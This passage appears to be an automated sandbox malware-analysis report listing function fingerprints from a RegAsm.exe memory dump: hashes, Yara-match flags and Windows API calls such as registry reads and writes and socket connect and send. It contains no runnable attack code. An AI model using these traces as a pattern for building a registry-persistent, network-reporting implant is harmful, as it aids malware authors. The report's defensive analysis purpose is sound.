                                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                          • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                          • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                          APIs
                                          • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                          • RegQueryValueExA.KERNEL32 ref: 00413622
                                          • RegCloseKey.KERNEL32(?), ref: 0041362D
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID:
                                          • API String ID: 3677997916-0
                                          • Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                          • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                          • Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                          • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                          APIs
                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                          • RegQueryValueExA.KERNEL32 ref: 00413768
                                          • RegCloseKey.KERNEL32(00000000), ref: 00413773
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID:
                                          • API String ID: 3677997916-0
                                          • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                          • Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
                                          • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                          • Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
                                          APIs
                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                          • RegQueryValueExA.KERNEL32 ref: 004135C2
                                          • RegCloseKey.KERNEL32(?), ref: 004135CD
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID:
                                          • API String ID: 3677997916-0
                                          • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                          • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                          • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                          • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                          APIs
                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413551
                                          • RegQueryValueExA.KERNEL32 ref: 00413565
                                          • RegCloseKey.KERNEL32(?), ref: 00413570
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID:
                                          • API String ID: 3677997916-0
                                          • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                          • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                          • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                          • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                          APIs
                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                          • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                          • RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCreateValue
                                          • String ID:
                                          • API String ID: 1818849710-0
                                          • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                          • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                          • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                          • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                          APIs
                                          • GdiplusStartup.GDIPLUS(00474ACC,?,00000000,00000000), ref: 004187FA
                                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00854950,00000010), ref: 004048E0
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: GdiplusStartupconnectsend
                                          • String ID: NG
                                          • API String ID: 1957403310-1651712548
                                          • Opcode ID: ac95375dd8309d9e0ed2265105671e99074506a039fa72e05eb7aa568a42b0db
                                          • Instruction ID: 646e85ae029ebb21aec6d49858a727e037fa7bb3a6359959f193cd142bf324ca
                                          • Opcode Fuzzy Hash: ac95375dd8309d9e0ed2265105671e99074506a039fa72e05eb7aa568a42b0db
                                          • Instruction Fuzzy Hash: 8E41D4713042015BC208FB22D892ABF7396ABC0358F50493FF54A672D2EF7C5D4A869E
                                          APIs
                                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EE69
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Info
                                          • String ID:
                                          • API String ID: 1807457897-3916222277
                                          • Opcode ID: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                          • Instruction ID: 2d4132b881e94a0a9fd0de77a922cbe9b4a8b8c61ff6a95216f325efaac8b060
                                          • Opcode Fuzzy Hash: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                          • Instruction Fuzzy Hash: 7E411070504748AFEF218E25CC84AF7BBB9FF45304F2404EEE59987142D2399A46DF65
                                          APIs
                                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Info
                                          • String ID:
                                          • API String ID: 1807457897-3916222277
                                          • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                          • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                                          • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                          • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _wcslen
                                          • String ID: ;p
                                          • API String ID: 176396367-2290485912
                                          • Opcode ID: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                          • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                                          • Opcode Fuzzy Hash: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                          • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                                          APIs
                                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448CA4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: String
                                          • String ID: LCMapStringEx
                                          • API String ID: 2568140703-3893581201
                                          • Opcode ID: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                          • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
                                          • Opcode Fuzzy Hash: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                          • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
                                          APIs
                                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: String
                                          • String ID: LCMapStringEx
                                          • API String ID: 2568140703-3893581201
                                          • Opcode ID: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                          • Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
                                          • Opcode Fuzzy Hash: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                          • Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95
                                          APIs
                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BFCF,-00000020,00000FA0,00000000,00467388,00467388), ref: 00448B4F
                                          Strings
                                          • InitializeCriticalSectionEx, xrefs: 00448B1F
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CountCriticalInitializeSectionSpin
                                          • String ID: InitializeCriticalSectionEx
                                          • API String ID: 2593887523-3084827643
                                          • Opcode ID: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                          • Instruction ID: 6b0d226957fc5e3530c80ec385177705bb254131620a7d42d33c8bf65efe755d
                                          • Opcode Fuzzy Hash: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                          • Instruction Fuzzy Hash: F0F0E93164021CFBCB025F55DC06E9E7F61EF08B22B00406AFD0956261DF3A9E61D6DD
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Alloc
                                          • String ID: FlsAlloc
                                          • API String ID: 2773662609-671089009
                                          • Opcode ID: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                          • Instruction ID: f8901b274c9ac7999680b04b2037e580393277d5e39e0d99f0e7f02c98ef4e36
                                          • Opcode Fuzzy Hash: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                          • Instruction Fuzzy Hash: 8FE05530640318F7D3016B21DC16A2FBB94DB04B22B10006FFD0553241EE794D15C5CE
                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                          Strings
                                          • GetSystemTimePreciseAsFileTime, xrefs: 004489F2
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Time$FileSystem
                                          • String ID: GetSystemTimePreciseAsFileTime
                                          • API String ID: 2086374402-595813830
                                          • Opcode ID: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                          • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                                          • Opcode Fuzzy Hash: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                          • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Alloc
                                          • String ID: FlsAlloc
                                          • API String ID: 2773662609-671089009
                                          • Opcode ID: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                          • Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
                                          • Opcode Fuzzy Hash: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                          • Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6
                                          APIs
                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B824
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: GlobalMemoryStatus
                                          • String ID: @
                                          • API String ID: 1890195054-2766056989
                                          • Opcode ID: 1ad00b6035bb2f9c69a92d20b28944e38dc856d82cbe2acb3b3194101eb7e45b
                                          • Instruction ID: 3917006bb4bdf28dbebd301c315ba2c969ca89c82ab29e5da1363915d2377671
                                          • Opcode Fuzzy Hash: 1ad00b6035bb2f9c69a92d20b28944e38dc856d82cbe2acb3b3194101eb7e45b
                                          • Instruction Fuzzy Hash: EBE0C9B6901228EBCB10DFA9E94498DFBF8FF48620B008166ED08A3704D770A815CB94
                                          APIs
                                          • try_get_function.LIBVCRUNTIME ref: 00438E29
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: try_get_function
                                          • String ID: FlsAlloc
                                          • API String ID: 2742660187-671089009
                                          • Opcode ID: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                          • Instruction ID: b64d3ab94c56a33c1928a034b10f94234fe941941be7f39555266fb58f36a209
                                          • Opcode Fuzzy Hash: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                          • Instruction Fuzzy Hash: 09D02B31BC1328B6C51032955C03BD9B6048B00FF7F002067FF0C61283899E592082DE
                                          APIs
                                          • try_get_function.LIBVCRUNTIME ref: 10003B06
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: try_get_function
                                          • String ID: FlsAlloc
                                          • API String ID: 2742660187-671089009
                                          • Opcode ID: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                          • Instruction ID: 0b7c7f44018c04906f4f2ef9afae3f4f684564eee465a9a4c05fe82f6616737e
                                          • Opcode Fuzzy Hash: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                          • Instruction Fuzzy Hash: 13D02B32744138B3F201B3A06C04BEEBB88D7025F2F040063FB4C5210CDB11591042E6
                                          APIs
                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: GlobalMemoryStatus
                                          • String ID: @
                                          • API String ID: 1890195054-2766056989
                                          • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                          • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                          • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                          • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                          APIs
                                            • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044F03A,?,00000000), ref: 0044F20D
                                          • GetCPInfo.KERNEL32(00000000,0044F03A,?,?,?,0044F03A,?,00000000), ref: 0044F220
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CodeInfoPageValid
                                          • String ID:
                                          • API String ID: 546120528-0
                                          • Opcode ID: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                          • Instruction ID: 491245c4813b68437391e3e70942b885a5b84425ef1b1be509cf98dd56c33fdc
                                          • Opcode Fuzzy Hash: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                          • Instruction Fuzzy Hash: A05153749002469EFB208F76C8816BBBBE4FF01304F1480BFD48687251E67E994A8B99
                                          APIs
                                            • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                                          • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: CodeInfoPageValid
                                          • String ID:
                                          • API String ID: 546120528-0
                                          • Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                          • Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
                                          • Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                          • Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                            • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
                                            • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
                                            • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                          • _free.LIBCMT ref: 0044F050
                                          • _free.LIBCMT ref: 0044F086
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorLast_abort
                                          • String ID:
                                          • API String ID: 2991157371-0
                                          • Opcode ID: 5c488e73cd7317a59bb91e94e032dcb6bf067ffc0982221c2c2ef85a747d1bec
                                          • Instruction ID: a9f826519387c1ac895116d2974c89b4af6d1f604a138ae73dd4863203302c4b
                                          • Opcode Fuzzy Hash: 5c488e73cd7317a59bb91e94e032dcb6bf067ffc0982221c2c2ef85a747d1bec
                                          • Instruction Fuzzy Hash: 2D31D371900104AFEB10EB69D441B9A77F4EF81325F2540AFE5049B2A3DB7A5D44CB58
                                          APIs
                                            • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                            • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                                            • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                            • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                                            • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                                            • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                                            • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                          • _free.LIBCMT ref: 10006CD7
                                          • _free.LIBCMT ref: 10006D0D
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _free$ErrorLast_abort
                                          • String ID:
                                          • API String ID: 2991157371-0
                                          • Opcode ID: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
